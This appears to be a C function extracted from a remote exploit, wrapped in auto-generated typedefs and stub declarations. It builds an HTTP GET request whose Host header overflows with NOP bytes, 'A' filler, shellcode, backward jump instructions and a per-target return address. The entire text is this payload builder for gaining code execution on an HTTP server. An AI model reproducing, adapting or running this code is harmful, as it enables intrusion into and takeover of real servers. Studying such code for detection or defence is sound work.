
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


typedef scalar_t__ jmp_bytes ;
typedef int fsh ;
struct TYPE_2__ {int ret; } ;


 int memcpy (unsigned char*,...) ;
 int memset (unsigned char*,char,int) ;
 int prepare_shellcode (unsigned char*,unsigned int*,int) ;
 unsigned int strlen (char*) ;
 TYPE_1__* targets ;

void make_buffer(unsigned char * buf, unsigned int * len, int itarget, int sh)
{

 unsigned char fsh[10000];
 unsigned int fshlength;
 memset(fsh, 0, sizeof(fsh));
 prepare_shellcode(fsh, &fshlength, sh);



 unsigned char * cp=buf;


 memcpy(cp, "GET / HTTP/1.0\r\nHost: ", strlen("GET / HTTP/1.0\r\nHost: ") );
 cp+=strlen((char *)cp);


 *cp++='\x90';
 *cp++='\x90';
 *cp++='\x90';
 *cp++='\x90';


 memset(cp, '\x41', 5001);


 memcpy(cp, fsh, fshlength);
 cp+=1271;


 int jmp_bytes=0xffffffff - (1275);


 *cp++ = '\xe9';
 *cp++ = (char)((jmp_bytes ) & 0xff);
 *cp++ = (char)((jmp_bytes >> 8) & 0xff);
 *cp++ = (char)((jmp_bytes >> 16) & 0xff);
 *cp++ = (char)((jmp_bytes >> 24) & 0xff);


 *cp++='\x90';
 *cp++='\x90';
 *cp++='\xeb';
 *cp++='\xf7';


 *cp++ = (char)((targets[itarget].ret ) & 0xff);
 *cp++ = (char)((targets[itarget].ret >> 8) & 0xff);
 *cp++ = (char)((targets[itarget].ret >> 16) & 0xff);
 *cp++ = (char)((targets[itarget].ret >> 24) & 0xff);


 cp+=3000;


 memcpy(cp, "\r\n\r\n", strlen("\r\n\r\n") );
 cp+=strlen((char *)cp);

}
